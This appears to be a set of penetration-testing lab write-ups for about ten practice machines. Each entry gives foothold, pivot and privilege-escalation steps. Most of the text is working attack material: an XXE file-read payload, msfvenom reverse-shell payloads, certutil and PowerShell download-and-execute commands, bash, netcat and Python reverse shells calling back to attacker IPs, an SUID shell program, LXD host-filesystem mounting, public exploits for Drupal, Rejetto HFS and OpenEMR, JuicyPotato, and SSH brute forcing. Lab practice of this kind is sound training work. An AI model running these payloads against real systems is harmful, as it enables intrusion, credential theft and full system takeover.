Skip to main content

Web 4

Web 31: Ladon Web SOAP API

Target: Linux

Foothold: File Inclusion via XXE

  • Exploit DB: https://www.exploit-db.com/exploits/43113
  • Ladon for Python SOAP API
  • XXE Payload: Reading passwd.dav from WebDAV service running on host (as discovered by nmap)
curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://127.0.0.1:8888/interface/soap11/method\"' \
--data-binary $'<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///var/www/html/webdav/passwd.dav">
]>
<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:interface\"><soapenv:Header/>
<soapenv:Body>
<urn:method soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">&passwd;</uid>
</urn:checkout>
</soapenv:Body>
</soapenv:Envelope>' \
'http://muddy.ugc:8888/muddy/soap11' | xmllint --format -
  • Crack the user hash and login into WebDAV service
  • Upload PHP reverse shell file

Privilege Escalation: PATH Injection

  • /etc/crontab has a job running as root every minute
  • PATH variable includes a non-standard directory
  • The directory is writeable
  • The script calls netstat
  • Inject a malicious netstat reverse shell script and get a reverse shell as root

Web 32: Nexus Repository Manager 3.21.0-05

Target: Windows

Foothold: Authenticated RCE

  • Make a cewl word list and base64 encoded the words, since the form input requires base64 encoded inputs for both username and password
cewl http://$target:8081 -w cewl-list && grep '^[A-Z]' cewl-list | sed 's/[A-Z]/\L&/g' >> cewl-list

for word in `cat cewl-list`; do echo $word | base64 >> cewl-b64 ; done
  • Use Burp Suite Intruder to test some logins
    • Attack type: pitchfork Pasted image 20211206112548.png
  • Notice some interesting status codes and make a short list
  • Get in with nexus:nexus
  • Using this exploit: https://www.exploit-db.com/exploits/49385
  • Generate an msfvenom payload
msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=8081 -f exe -o shell.exe
  • Update the payload
URL='http://192.168.184.61:8081'
#CMD='cmd.exe /c shell.exe'
CMD='certutil.exe -urlcache -split -f http://192.168.49.184/shell.exe shell.exe'
USERNAME='nexus'
PASSWORD='nexus'
  • Uncomment for each run to upload and run the shell

Privilege Escalation: SMBGhost

  • Host is running Windows 10 1903
  • Based on patch level is vulnerable to SMBGhost
    • Latest patch installed on March 2020
  • Clone the repo on Windows VM https://github.com/danigargu/CVE-2020-0796
  • Generate x64 shellcode with msfvenom and replace it in the exploit.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$tun0 LPORT=8081 -f dll -f csharp
  • Compile the exploit on Windows VM and transfer to Kali, then transfer to target
  • Start a listener and run the LPE exploit

Web 33: PHP Curl Server (curl_exec)

Target: Linux

Foothold: Local File Inclusion (via curl)

  • Anonymous FTP login exposed a complete backup of the web server
  • Viewing the /sites-available/config.conf file I found the VHost to hit
  • Enumerated subdirectories and found /intranet => 403
    • Reviewing the Apache config, I see that this directory requires a local connection
  • On the dev server at http://host-ip/dev/ there is a curl.php script
    • Use the input box to hit http://vhost-dns-name/intranet/
    • Reveals a Tomcat manager login
    • Login and create WAR reverse shell payload and grab a low-level shell

Lateral Pivot: NFS no_all_squash

  • Mapped a share from the host /srv/nfs *(rw,no_squash_all)
  • Found that I can spoof UID and GID 1337
  • Create a payload to load bash as the user with SUID bit
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
        setreuid(1337, 1337);
        printf("ID: %d\n", geteuid());
        execve("/bin/bash", NULL, NULL);
}
  • Compile it inside the NFS share gcc suid.c -o pwn
  • Set the SUID bit chmod 4777 pwn
  • Now in my initial reverse shell, execute the payload /srv/nfs/pwn
  • Now running as a low-privileged user

Privilege Escalation: LXD Group Membership

  • Followed the steps here to create a Linux container for privilege escalation
    • Very similar to the way Docker can be used to mound the host filesystem as root
  • Then change directory to /mnt/root/root and grab the flag.

Web 34: Insecure Password Management

Target: Linux

Foothold: File Browswer 2.15.0 Shell Commands

  • EveryPass Password Manager on TCP/80

  • Password commented in page source, unlocked vault

  • Revealed admin password for FileBrowser 2.15.0 running on TCP/8080

  • Go to http://target-ip:8080/ and open file browser

    • There is a toggle shell button that allows the authenticated user to run application-specific and host shell commands
    • In the user settings, you can specify a space-separated list of approved commands for the current user
      • Specified: bash nc sh python ruby php ls pwd to try a few
      • Then, in the Global Settings specify that shell commands should be prefixed by bash -c, so as to avoid I/O problems in the pseudo-shell
    • In the shell, call to listener by running: bash -i >& /dev/tcp/10.0.0.2/8080 0>&1

Lateral Pivot: Werkzeug Debug Shell

  • Once the reverse shell was established I enumerated for a while
  • Found another user called intern
  • Looked for their processes and found: sh -c cd /home/intern/flask && WERKZEUG_DEBUG_PIN=040-197 pipenv run python3 run.py
  • Did some googling on the subject matter and found that the Flask app binds to TCP/5000
  • This is only available on 127.0.0.1, so I have to port forward
  • On Kali:
sudo ./chisel server -p 3477 --reverse
  • On Target:
./chisel client 10.0.0.2:3477 R:50011:0.0.0.0:5000/tcp
  • Now, in web browser on Kali go to http://127.0.0.1:50011
  • Input PIN from process output and unlock the debug console
  • Now, I can pass raw Python commands and the server will parse them.
    • This should give me a shell as intern 
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.2"8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Privilege Escalation: SUID File

  • Further enumeration, found source code for logentry.c
  • Also a SUID file: /usr/bin/logentry
  • After reviewing the source code I found a comment that stuck out
    • Global variable for the passwd structure
    • Creates an object using /etc/passwd depending on the target_user
  • I attempted to use gdb to read the variable, as well as other modifications
    • Having the source code available, I could create debug symbos as well
    • gcc -g logentry.c outputs logentry.o
    • Import the debug tables into gdb: add-symbol-file /path/to/logentry.o
    • This allows me to see variable and function names
  • Eventually, decided to let this one go, since it was outside my current abilities

Web 35: Command Execution via Debug Shell

Target: Linux

Foothold: Globally Accessible Web Debug Shell

  • Enumerate web port TCP/8080 and find a /debug directory that is globally accessible
  • Allows for unauthenticated command execution on the underlying host OS
  • Start netcat listener and receive reverse shell with this payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.2 443 >/tmp/f

Lateral Pivot: www-user Passwordless Sudo

  • Run sudo -l to enumerate sudo privileges as www-user
  • Passwordless sudo to run sudo -u username
  • Running the id command shows the user is a member of the lxd group

Privilege Escalation: Mount Host Filesystem with Privileged Linux Container

  • No preinstalled Linux Container image
  • No sudo privileges
    • So, no sudo lxd-alpine-builder using prebuilt Alpine linux payload
  • Must download a pre-built image from sources and import manually
  • Download a Linux Container image from here 
wget --no-parent -r https://us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20220720_13:00/
cd us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20220720_13:00/
find . -name '*html*' -delete
tar -cvf alpine.tar ./*
  • Transfer to target and extract
mkdir alpine
tar -xvf alpine.tar -C alpine
cd alpine
  • Import the container image, mount the host file system, open a shell on the container
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxd init
lxc init alpine alpinect -c security.privileged=true
lxc config device add alpinect pwndisk disk source=/ path=/mnt/root recursive=true
lxc start alpinect
lxc exec alpinect /bin/sh

Web 36: Command Execution via CGI-BIN

Target: Linux

Foothold: Command Exection and File System Access

  • A CGI-BIN exposes a traceroute script that asks for an IP address from a user
  • Takes IP input from user and passes to traceroute on host OS
  • No input validation/sanitization, can chain another host command with something like ; less /etc/passwd
  • Was unable to achieve a reverse shell due to some constraints
  • Read configuration file with password instead
  • ssh as user and establish a shell that way

Lateral Pivot: Poorly Implemented Password Manager

  • Using post-exploit enumerated info, was able to find a password to unlock a vault
  • Password vault revealed a clue about a potential SSH password
  • Generate a wordlist using the clue
# ?u = upper
# ?d = digit
mp64 ?u?dKeyword >> wordlist
mp64 ?u?dkeyword >> wordlist
  • hydra brute force ssh 
hydra -IVf -s 22222 -l username -P wordlist ssh://target-ip-address

Privilege Escalation: Sudo All Commands

  • Logged in as user via SSH
  • Enumerate sudo privileges
  • User can sudo all commands
  • Run sudo su

Web 37: OpenEMR 4.1.0 - Blind SQL Injection

Target: Linux

Foothold: Unauthenticated Blind SQL Injection, Weak Passwords, and File Upload

  • Web enumeration reveals a /openemr directory on the web server
  • Running OpenEMR 4.1.0, which is vulnerable to blind SQL injection
    • Exploit Databse entry 49742
    • Script uses time-based enumeration to match characters in usernames and hashes
  • Modify url variable in script with the target URL
  • Run the script: python ./49742.py
  • Get usernames and hashes
  • Crack with john
john --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords.txt hash
  • Log in as admin user
    • Under the Administration interface, there is a file editor and file upload function
      • File editor would allow me to edit an existing .php file with reverse shell payload
      • File upload expects image file, but does not validte MIME type in testing
    • Use PHP payload from here
      • Upload using image upload function
      • Start listener
      • Navigate to: http://target-ip/openemr/sites/default/images/shell.php

Privilege Escalation: SUID file and Path Injection

  • During post-exploit enumeration, check for SUID files
  • /usr/bin/bin_name is a custom binary
  • Analyze with strings
  • Does not use absolute paths to system utils like clear, echo, ifconfig, etc
# Copy the bash binary to /tmp/clear
cp /bin/bash /tmp/clear

# Add /tmp first in path precedence so /tmp/clear resolves first
export PATH=/tmp:$PATH

# Run the binary
/usr/bin/bin_name

Web 38: Rejetto HTTPFileServer httpd 2.3

Target: Windows Server 2012 R2

Foothold: Unauthenticated RCE

  • Start Python web server
  • Generate msfvenom payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=<kali-vpn-ip> LPORT=<kali-tcp-port> -e x64/xor_dynamic -b '\x00' -a x64 --platform windows -f exe -o shell.exe
  • Start listener
  • Download and execute the payload on the target
http://10.10.10.8/?search=%00{.exec|powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://kali-ipaddres/shell.exe','C:\Windows\Temp\shell.exe')" ; cmd.exe /c "C:\Windows\Temp\shell.exe".}

Privilege Escalation: MS16-032 (.ps1)

(New-Object Net.WebClient).DownloadString('http://<kali-vpn-ip>/Invoke-MS16032.ps1') | Invoke-Expression
  • Re-use msfvenom payload from initial exploit
  • Start listener
Invoke-MS16032 -Command "cmd.exe /c C:\Windows\Temp\shell.exe"

Web 39: Drupal 7.54

Target: Windows Server 2008 R2

Foothold: CVE-2018-7600 (Drupalgeddon2) (Unauthenticated)

  • Spawn a PHP pseudo-shell
# Copy the exploit
searchsploit -m 44449
# Install ruby dependency
sudo gem install -y highline
# Run the unauthenticated exploit
ruby 44449.rb http://$target

  • Stabilize shell
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-ip-address LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe
  • Transfer to target using command line in pseduo-shell
certutil.exe -urlcache -split -f http://kali-ip/shell.exe C:\Windows\Temp\shell.exe
  • Start a listener and run the exploit on the target

Privilege Escalation: SeImpersonatePrivilege (JuicyPotato)

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a '/c C:\Windows\Temp\shell.exe' -l 4444 -t * -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'

Web 40: Microsoft IIS 6.0

Target: Windows Server 2003 SP2

Foothold: Overly Permissive WebDAV Server

  • nmap scan showed:
Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
  • Unauthenticated WebDAV user is able to upload malicious files
  • Certain file extenions are forbidden
    • Can be bypassed by renaming file extensions
msfvenom -p windows/shell_reverse_tcp LHOST=kali-ip LPORT=kali-port -a x86 --platform windows -f aspx -o shell.aspx.txt
dave
dave> open http://target-server
dave> put shell.aspx.txt
dave> mv shell.aspx.txt shell.aspx
  • Now shell.aspx is in the web root
    • Start listener
    • Open http://$target/shell.aspx in browser

Privilege Escalation: SeImpersonatePrivilege (Token Kidnapping)

searchsploit -m 6705
less 6705.txt

msfvenom -p windows/shell_reverse_tcp LHOST=kali-ip LPORT=kali-port -a x86 --platform windows -f aspx -o privesc.exe.txt
dave> open http://target-server
dave> put privesc.exe.txt
dave> mv privesc.exe.txt privesc.exe
  • Start listener
.\churrasco.exe -d "C:\Inetpub\wwwroot\privesc.exe"
Back to top